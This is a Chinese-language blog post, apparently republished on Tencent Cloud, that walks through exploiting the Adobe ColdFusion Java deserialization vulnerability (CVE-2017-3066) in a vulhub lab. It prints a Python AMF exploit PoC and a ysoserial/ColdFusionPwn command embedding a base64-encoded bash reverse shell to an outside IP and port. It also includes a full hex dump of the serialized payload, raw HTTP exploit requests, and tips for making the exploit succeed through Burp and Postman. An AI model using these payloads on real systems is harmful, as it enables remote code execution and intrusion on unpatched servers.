Adobe ColdFusion 反序列化漏洞复现踩坑
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。
参考链接:
- https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html
- https://www.exploit-db.com/exploits/43993
- https://github.com/codewhitesec/ColdFusionPwn
由于在实战中利用过这个漏洞,而且打的时候差点崩溃,换了好多burp才成功。今天碰巧又遇到这个洞了,那么在本地搭建一下开始复现一波。
使用vulhub环境。(vulhub YYDS)
前面过程按照 https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2010-2861/README.zh-cn.md 操作即可。
这时候很多同学的exp都不成功,原因在于burp了
我们看一下CVE-2017-3066的poc
import struct
import sys
import requests
if len(sys.argv) != 5:
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
quit()
target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
struct.pack('>I', int(callback_port)) + \
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)开始搞:
(base) ➜ ColdFusion java -cp coldpwn.jar:yso.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}' poc.ser查看一下hex:
(base) ➜xxd poc.ser
00000000: 0003 0000 0001 0000 0000 0000 0001 110a ................
00000010: 0747 6f72 672e 6170 6163 6865 2e61 7869 .Gorg.apache.axi
00000020: 7332 2e75 7469 6c2e 4d65 7461 4461 7461 s2.util.MetaData
00000030: 456e 7472 797c 998b d2c6 4fb4 e300 0000 Entry|....O.....
00000040: 0201 0000 000b 2aac ed00 0573 7200 176a ......*....sr..j
00000050: 6176 612e 7574 696c 2e50 7269 6f72 6974 ava.util.Priorit
00000060: 7951 7565 7565 94da 30b4 fb3f 82b1 0300 yQueue..0..?....
00000070: 0249 0004 7369 7a65 4c00 0a63 6f6d 7061 .I..sizeL..compa
00000080: 7261 746f 7274 0016 4c6a 6176 612f 7574 ratort..Ljava/ut
00000090: 696c 2f43 6f6d 7061 7261 746f 723b 7870 il/Comparator;xp
000000a0: 0000 0002 7372 002b 6f72 672e 6170 6163 ....sr.+org.apac
000000b0: 6865 2e63 6f6d 6d6f 6e73 2e62 6561 6e75 he.commons.beanu
000000c0: 7469 6c73 2e42 6561 6e43 6f6d 7061 7261 tils.BeanCompara
000000d0: 746f 72cf 8e01 82fe 4ef1 7e02 0002 4c00 tor.....N.~...L.
000000e0: 0a63 6f6d 7061 7261 746f 7271 007e 0001 .comparatorq.~..
000000f0: 4c00 0870 726f 7065 7274 7974 0012 4c6a L..propertyt..Lj
00000100: 6176 612f 6c61 6e67 2f53 7472 696e 673b ava/lang/String;
00000110: 7870 7372 003f 6f72 672e 6170 6163 6865 xpsr.?org.apache
00000120: 2e63 6f6d 6d6f 6e73 2e63 6f6c 6c65 6374 .commons.collect
00000130: 696f 6e73 2e63 6f6d 7061 7261 746f 7273 ions.comparators
00000140: 2e43 6f6d 7061 7261 626c 6543 6f6d 7061 .ComparableCompa
00000150: 7261 746f 72fb f499 25b8 6eb1 3702 0000 rator...%.n.7...
00000160: 7870 7400 106f 7574 7075 7450 726f 7065 xpt..outputPrope
00000170: 7274 6965 7377 0400 0000 0373 7200 3a63 rtiesw.....sr.:c
00000180: 6f6d 2e73 756e 2e6f 7267 2e61 7061 6368 om.sun.org.apach
00000190: 652e 7861 6c61 6e2e 696e 7465 726e 616c e.xalan.internal
000001a0: 2e78 736c 7463 2e74 7261 782e 5465 6d70 .xsltc.trax.Temp
000001b0: 6c61 7465 7349 6d70 6c09 574f c16e acab latesImpl.WO.n..
000001c0: 3303 0006 4900 0d5f 696e 6465 6e74 4e75 3...I.._indentNu
000001d0: 6d62 6572 4900 0e5f 7472 616e 736c 6574 mberI.._translet
000001e0: 496e 6465 785b 000a 5f62 7974 6563 6f64 Index[.._bytecod
000001f0: 6573 7400 035b 5b42 5b00 065f 636c 6173 est..[[B[.._clas
00000200: 7374 0012 5b4c 6a61 7661 2f6c 616e 672f st..[Ljava/lang/
00000210: 436c 6173 733b 4c00 055f 6e61 6d65 7100 Class;L.._nameq.
00000220: 7e00 044c 0011 5f6f 7574 7075 7450 726f ~..L.._outputPro
00000230: 7065 7274 6965 7374 0016 4c6a 6176 612f pertiest..Ljava/
00000240: 7574 696c 2f50 726f 7065 7274 6965 733b util/Properties;
00000250: 7870 0000 0000 ffff ffff 7572 0003 5b5b xp........ur..[[
00000260: 424b fd19 1567 67db 3702 0000 7870 0000 BK...gg.7...xp..
00000270: 0002 7572 0002 5b42 acf3 17f8 0608 54e0 ..ur..[B......T.
00000280: 0200 0078 7000 0006 f7ca feba be00 0000 ...xp...........
00000290: 3200 390a 0003 0022 0700 3707 0025 0700 2.9...."..7..%..
000002a0: 2601 0010 7365 7269 616c 5665 7273 696f &...serialVersio
000002b0: 6e55 4944 0100 014a 0100 0d43 6f6e 7374 nUID...J...Const
000002c0: 616e 7456 616c 7565 05ad 2093 f391 ddef antValue.. .....
000002d0: 3e01 0006 3c69 6e69 743e 0100 0328 2956 >...<init>...()V
000002e0: 0100 0443 6f64 6501 000f 4c69 6e65 4e75 ...Code...LineNu
000002f0: 6d62 6572 5461 626c 6501 0012 4c6f 6361 mberTable...Loca
00000300: 6c56 6172 6961 626c 6554 6162 6c65 0100 lVariableTable..
00000310: 0474 6869 7301 0013 5374 7562 5472 616e .this...StubTran
00000320: 736c 6574 5061 796c 6f61 6401 000c 496e sletPayload...In
00000330: 6e65 7243 6c61 7373 6573 0100 354c 7973 nerClasses..5Lys
00000340: 6f73 6572 6961 6c2f 7061 796c 6f61 6473 oserial/payloads
00000350: 2f75 7469 6c2f 4761 6467 6574 7324 5374 /util/Gadgets$St
00000360: 7562 5472 616e 736c 6574 5061 796c 6f61 ubTransletPayloa
00000370: 643b 0100 0974 7261 6e73 666f 726d 0100 d;...transform..
00000380: 7228 4c63 6f6d 2f73 756e 2f6f 7267 2f61 r(Lcom/sun/org/a
00000390: 7061 6368 652f 7861 6c61 6e2f 696e 7465 pache/xalan/inte
000003a0: 726e 616c 2f78 736c 7463 2f44 4f4d 3b5b rnal/xsltc/DOM;[
000003b0: 4c63 6f6d 2f73 756e 2f6f 7267 2f61 7061 Lcom/sun/org/apa
000003c0: 6368 652f 786d 6c2f 696e 7465 726e 616c che/xml/internal
000003d0: 2f73 6572 6961 6c69 7a65 722f 5365 7269 /serializer/Seri
000003e0: 616c 697a 6174 696f 6e48 616e 646c 6572 alizationHandler
000003f0: 3b29 5601 0008 646f 6375 6d65 6e74 0100 ;)V...document..
00000400: 2d4c 636f 6d2f 7375 6e2f 6f72 672f 6170 -Lcom/sun/org/ap
00000410: 6163 6865 2f78 616c 616e 2f69 6e74 6572 ache/xalan/inter
00000420: 6e61 6c2f 7873 6c74 632f 444f 4d3b 0100 nal/xsltc/DOM;..
00000430: 0868 616e 646c 6572 7301 0042 5b4c 636f .handlers..B[Lco
00000440: 6d2f 7375 6e2f 6f72 672f 6170 6163 6865 m/sun/org/apache
00000450: 2f78 6d6c 2f69 6e74 6572 6e61 6c2f 7365 /xml/internal/se
00000460: 7269 616c 697a 6572 2f53 6572 6961 6c69 rializer/Seriali
00000470: 7a61 7469 6f6e 4861 6e64 6c65 723b 0100 zationHandler;..
00000480: 0a45 7863 6570 7469 6f6e 7307 0027 0100 .Exceptions..'..
00000490: a628 4c63 6f6d 2f73 756e 2f6f 7267 2f61 .(Lcom/sun/org/a
000004a0: 7061 6368 652f 7861 6c61 6e2f 696e 7465 pache/xalan/inte
000004b0: 726e 616c 2f78 736c 7463 2f44 4f4d 3b4c rnal/xsltc/DOM;L
000004c0: 636f 6d2f 7375 6e2f 6f72 672f 6170 6163 com/sun/org/apac
000004d0: 6865 2f78 6d6c 2f69 6e74 6572 6e61 6c2f he/xml/internal/
000004e0: 6474 6d2f 4454 4d41 7869 7349 7465 7261 dtm/DTMAxisItera
000004f0: 746f 723b 4c63 6f6d 2f73 756e 2f6f 7267 tor;Lcom/sun/org
00000500: 2f61 7061 6368 652f 786d 6c2f 696e 7465 /apache/xml/inte
00000510: 726e 616c 2f73 6572 6961 6c69 7a65 722f rnal/serializer/
00000520: 5365 7269 616c 697a 6174 696f 6e48 616e SerializationHan
00000530: 646c 6572 3b29 5601 0008 6974 6572 6174 dler;)V...iterat
00000540: 6f72 0100 354c 636f 6d2f 7375 6e2f 6f72 or..5Lcom/sun/or
00000550: 672f 6170 6163 6865 2f78 6d6c 2f69 6e74 g/apache/xml/int
00000560: 6572 6e61 6c2f 6474 6d2f 4454 4d41 7869 ernal/dtm/DTMAxi
00000570: 7349 7465 7261 746f 723b 0100 0768 616e sIterator;...han
00000580: 646c 6572 0100 414c 636f 6d2f 7375 6e2f dler..ALcom/sun/
00000590: 6f72 672f 6170 6163 6865 2f78 6d6c 2f69 org/apache/xml/i
000005a0: 6e74 6572 6e61 6c2f 7365 7269 616c 697a nternal/serializ
000005b0: 6572 2f53 6572 6961 6c69 7a61 7469 6f6e er/Serialization
000005c0: 4861 6e64 6c65 723b 0100 0a53 6f75 7263 Handler;...Sourc
000005d0: 6546 696c 6501 000c 4761 6467 6574 732e eFile...Gadgets.
000005e0: 6a61 7661 0c00 0a00 0b07 0028 0100 3379 java.......(..3y
000005f0: 736f 7365 7269 616c 2f70 6179 6c6f 6164 soserial/payload
00000600: 732f 7574 696c 2f47 6164 6765 7473 2453 s/util/Gadgets$S
00000610: 7475 6254 7261 6e73 6c65 7450 6179 6c6f tubTransletPaylo
00000620: 6164 0100 4063 6f6d 2f73 756e 2f6f 7267 ad..@com/sun/org
00000630: 2f61 7061 6368 652f 7861 6c61 6e2f 696e /apache/xalan/in
00000640: 7465 726e 616c 2f78 736c 7463 2f72 756e ternal/xsltc/run
00000650: 7469 6d65 2f41 6273 7472 6163 7454 7261 time/AbstractTra
00000660: 6e73 6c65 7401 0014 6a61 7661 2f69 6f2f nslet...java/io/
00000670: 5365 7269 616c 697a 6162 6c65 0100 3963 Serializable..9c
00000680: 6f6d 2f73 756e 2f6f 7267 2f61 7061 6368 om/sun/org/apach
00000690: 652f 7861 6c61 6e2f 696e 7465 726e 616c e/xalan/internal
000006a0: 2f78 736c 7463 2f54 7261 6e73 6c65 7445 /xsltc/TransletE
000006b0: 7863 6570 7469 6f6e 0100 1f79 736f 7365 xception...ysose
000006c0: 7269 616c 2f70 6179 6c6f 6164 732f 7574 rial/payloads/ut
000006d0: 696c 2f47 6164 6765 7473 0100 083c 636c il/Gadgets...<cl
000006e0: 696e 6974 3e01 0011 6a61 7661 2f6c 616e init>...java/lan
000006f0: 672f 5275 6e74 696d 6507 002a 0100 0a67 g/Runtime..*...g
00000700: 6574 5275 6e74 696d 6501 0015 2829 4c6a etRuntime...()Lj
00000710: 6176 612f 6c61 6e67 2f52 756e 7469 6d65 ava/lang/Runtime
00000720: 3b0c 002c 002d 0a00 2b00 2e01 0061 6261 ;..,.-..+....aba
00000730: 7368 202d 6320 7b65 6368 6f2c 596d 467a sh -c {echo,YmFz
00000740: 6143 4174 6153 412b 4a69 4176 5a47 5632 aCAtaSA+JiAvZGV2
00000750: 4c33 526a 6343 3878 4d54 6775 4d54 6b77 L3RjcC8xMTguMTkw
00000760: 4c6a 6b33 4c6a 4535 4c7a 6778 4f44 4567 Ljk3LjE5LzgxODEg
00000770: 4d44 346d 4d51 3d3d 7d7c 7b62 6173 6536 MD4mMQ==}|{base6
00000780: 342c 2d64 7d7c 7b62 6173 682c 2d69 7d08 4,-d}|{bash,-i}.
00000790: 0030 0100 0465 7865 6301 0027 284c 6a61 .0...exec..'(Lja
000007a0: 7661 2f6c 616e 672f 5374 7269 6e67 3b29 va/lang/String;)
000007b0: 4c6a 6176 612f 6c61 6e67 2f50 726f 6365 Ljava/lang/Proce
000007c0: 7373 3b0c 0032 0033 0a00 2b00 3401 000d ss;..2.3..+.4...
000007d0: 5374 6163 6b4d 6170 5461 626c 6501 001e StackMapTable...
000007e0: 7973 6f73 6572 6961 6c2f 5077 6e65 7231 ysoserial/Pwner1
000007f0: 3732 3039 3430 3734 3633 3439 3830 0100 72094074634980..
00000800: 204c 7973 6f73 6572 6961 6c2f 5077 6e65 Lysoserial/Pwne
00000810: 7231 3732 3039 3430 3734 3633 3439 3830 r172094074634980
00000820: 3b00 2100 0200 0300 0100 0400 0100 1a00 ;.!.............
00000830: 0500 0600 0100 0700 0000 0200 0800 0400 ................
00000840: 0100 0a00 0b00 0100 0c00 0000 2f00 0100 ............/...
00000850: 0100 0000 052a b700 01b1 0000 0002 000d .....*..........
00000860: 0000 0006 0001 0000 002f 000e 0000 000c ........./......
00000870: 0001 0000 0005 000f 0038 0000 0001 0013 .........8......
00000880: 0014 0002 000c 0000 003f 0000 0003 0000 .........?......
00000890: 0001 b100 0000 0200 0d00 0000 0600 0100 ................
000008a0: 0000 3300 0e00 0000 2000 0300 0000 0100 ..3..... .......
000008b0: 0f00 3800 0000 0000 0100 1500 1600 0100 ..8.............
000008c0: 0000 0100 1700 1800 0200 1900 0000 0400 ................
000008d0: 0100 1a00 0100 1300 1b00 0200 0c00 0000 ................
000008e0: 4900 0000 0400 0000 01b1 0000 0002 000d I...............
000008f0: 0000 0006 0001 0000 0036 000e 0000 002a .........6.....*
00000900: 0004 0000 0001 000f 0038 0000 0000 0001 .........8......
00000910: 0015 0016 0001 0000 0001 001c 001d 0002 ................
00000920: 0000 0001 001e 001f 0003 0019 0000 0004 ................
00000930: 0001 001a 0008 0029 000b 0001 000c 0000 .......)........
00000940: 0024 0003 0002 0000 000f a700 0301 4cb8 .$............L.
00000950: 002f 1231 b600 3557 b100 0000 0100 3600 ./.1..5W......6.
00000960: 0000 0300 0103 0002 0020 0000 0002 0021 ......... .....!
00000970: 0011 0000 000a 0001 0002 0023 0010 0009 ...........#....
00000980: 7571 007e 0010 0000 01d4 cafe babe 0000 uq.~............
00000990: 0032 001b 0a00 0300 1507 0017 0700 1807 .2..............
000009a0: 0019 0100 1073 6572 6961 6c56 6572 7369 .....serialVersi
000009b0: 6f6e 5549 4401 0001 4a01 000d 436f 6e73 onUID...J...Cons
000009c0: 7461 6e74 5661 6c75 6505 71e6 69ee 3c6d tantValue.q.i.<m
000009d0: 4718 0100 063c 696e 6974 3e01 0003 2829 G....<init>...()
000009e0: 5601 0004 436f 6465 0100 0f4c 696e 654e V...Code...LineN
000009f0: 756d 6265 7254 6162 6c65 0100 124c 6f63 umberTable...Loc
00000a00: 616c 5661 7269 6162 6c65 5461 626c 6501 alVariableTable.
00000a10: 0004 7468 6973 0100 0346 6f6f 0100 0c49 ..this...Foo...I
00000a20: 6e6e 6572 436c 6173 7365 7301 0025 4c79 nnerClasses..%Ly
00000a30: 736f 7365 7269 616c 2f70 6179 6c6f 6164 soserial/payload
00000a40: 732f 7574 696c 2f47 6164 6765 7473 2446 s/util/Gadgets$F
00000a50: 6f6f 3b01 000a 536f 7572 6365 4669 6c65 oo;...SourceFile
00000a60: 0100 0c47 6164 6765 7473 2e6a 6176 610c ...Gadgets.java.
00000a70: 000a 000b 0700 1a01 0023 7973 6f73 6572 .........#ysoser
00000a80: 6961 6c2f 7061 796c 6f61 6473 2f75 7469 ial/payloads/uti
00000a90: 6c2f 4761 6467 6574 7324 466f 6f01 0010 l/Gadgets$Foo...
00000aa0: 6a61 7661 2f6c 616e 672f 4f62 6a65 6374 java/lang/Object
00000ab0: 0100 146a 6176 612f 696f 2f53 6572 6961 ...java/io/Seria
00000ac0: 6c69 7a61 626c 6501 001f 7973 6f73 6572 lizable...ysoser
00000ad0: 6961 6c2f 7061 796c 6f61 6473 2f75 7469 ial/payloads/uti
00000ae0: 6c2f 4761 6467 6574 7300 2100 0200 0300 l/Gadgets.!.....
00000af0: 0100 0400 0100 1a00 0500 0600 0100 0700 ................
00000b00: 0000 0200 0800 0100 0100 0a00 0b00 0100 ................
00000b10: 0c00 0000 2f00 0100 0100 0000 052a b700 ..../........*..
00000b20: 01b1 0000 0002 000d 0000 0006 0001 0000 ................
00000b30: 003a 000e 0000 000c 0001 0000 0005 000f .:..............
00000b40: 0012 0000 0002 0013 0000 0002 0014 0011 ................
00000b50: 0000 000a 0001 0002 0016 0010 0009 7074 ..............pt
00000b60: 0004 5077 6e72 7077 0100 7871 007e 000d ..Pwnrpw..xq.~..
00000b70: 7801 0101 x...
导入burp (burp拉胯的问题):
POST /flex2gateway/amf HTTP/1.1
Host: 60.205.212.75:8006
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Content-Type: application/x-amf
Content-Length: 3003
\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a
Gorg.apache.axis2.util.MetaDataEntry|ÒÆO´ã*¬ísrjava.util.PriorityQueueÚ0´û?±IsizeL
comparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparatorÏþNñ~L
comparatorq~LpropertytLjava/lang/String;xpsr?org.apache.commons.collections.comparators.ComparableComparatorûô%¸n±7xptoutputPropertieswsr:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl WOÁn¬«3I_indentNumberI_transletIndex[
_bytecodest[[B[_classt[Ljava/lang/Class;L_nameq~L_outputPropertiestLjava/util/Properties;xpÿÿÿÿur[[BKýggÛ7xpur[B¬óøTàxp÷Êþº¾29
"7%&serialVersionUIDJConstantValue óÝï><init>()VCodeLineNumberTableLocalVariableTablethisStubTransletPayloadInnerClasses5Lysoserial/payloads/util/Gadgets$StubTransletPayload; transformr(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Vdocument-Lcom/sun/org/apache/xalan/internal/xsltc/DOM;handlersB[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;
Exceptions'¦(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Viterator5Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;handlerALcom/sun/org/apache/xml/internal/serializer/SerializationHandler;
SourceFileGadgets.java
(3ysoserial/payloads/util/Gadgets$StubTransletPayload@com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTransletjava/io/Serializable9com/sun/org/apache/xalan/internal/xsltc/TransletExceptionysoserial/payloads/util/Gadgets<clinit>java/lang/Runtime*
getRuntime()Ljava/lang/Runtime;,-
+.abash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}0exec'(Ljava/lang/String;)Ljava/lang/Process;23
+4StackMapTableysoserial/Pwner172094074634980 Lysoserial/Pwner172094074634980;!
/*·±/8?±3 8I±6*8)$§L¸/1¶5W±6 !
# uq~ÔÊþº¾2
serialVersionUIDJConstantValueqæiî<mG<init>()VCodeLineNumberTableLocalVariableTablethisFooInnerClasses%Lysoserial/payloads/util/Gadgets$Foo;
SourceFileGadgets.java
#ysoserial/payloads/util/Gadgets$Foojava/lang/Objectjava/io/Serializableysoserial/payloads/util/Gadgets!
/*·±:
ptPwnrpwxq~x发现hex 对不上,导致无法exp成功!
这时候大家也不必非得找一堆burp测试,可以使用postman 一把梭!
配置postman代理,将postman 流量代理到burp上。
POC生成于poc.ser文件中,将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf:
导入pm
点击send
这时候bp收到流量:
这时候就不会出现hex 不一致的问题了 。
POST /flex2gateway/amf HTTP/1.1
Content-Type: application/x-amf
User-Agent: PostmanRuntime/7.28.4
Accept: */*
Postman-Token: e6337283-3d4b-4ffb-bec0-b7f5d6575345
Host: 60.205.212.75:8006
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=21449A61E070DA3C42D224ED7EBF1F33.cfusion
Content-Length: 2932
Gorg.apache.axis2.util.MetaDataEntry|����O��*��srjava.util.PriorityQueue��0��?��IsizeL
comparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparatorώ��N�~L
comparatorq~LpropertytLjava/lang/String;xpsr?org.apache.commons.collections.comparators.ComparableComparator���%�n�7xptoutputPropertieswsr:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl WO�n��3I_indentNumberI_transletIndex[
_bytecodest[[B[_classt[Ljava/lang/Class;L_nameq~L_outputPropertiestLjava/util/Properties;xp����ur[[BK�gg�7xpur[B���T�xp�����29
"7%&serialVersionUIDJConstantValue� ����><init>()VCodeLineNumberTableLocalVariableTablethisStubTransletPayloadInnerClasses5Lysoserial/payloads/util/Gadgets$StubTransletPayload; transformr(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Vdocument-Lcom/sun/org/apache/xalan/internal/xsltc/DOM;handlersB[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;
Exceptions'�(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Viterator5Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;handlerALcom/sun/org/apache/xml/internal/serializer/SerializationHandler;
SourceFileGadgets.java
(3ysoserial/payloads/util/Gadgets$StubTransletPayload@com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTransletjava/io/Serializable9com/sun/org/apache/xalan/internal/xsltc/TransletExceptionysoserial/payloads/util/Gadgets<clinit>java/lang/Runtime*
getRuntime()Ljava/lang/Runtime;,-
+.abash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}0exec'(Ljava/lang/String;)Ljava/lang/Process;23
+4StackMapTableysoserial/Pwner172094074634980 Lysoserial/Pwner172094074634980;!
/*��/8?�3 8I�6*8)$�L�/1�5W�6 !
# uq~�����2
serialVersionUIDJConstantValueq�i�<mG<init>()VCodeLineNumberTableLocalVariableTablethisFooInnerClasses%Lysoserial/payloads/util/Gadgets$Foo;
SourceFileGadgets.java
#ysoserial/payloads/util/Gadgets$Foojava/lang/Objectjava/io/Serializableysoserial/payloads/util/Gadgets!
/*��:
ptPwnrpwxq~x本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-09-14,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
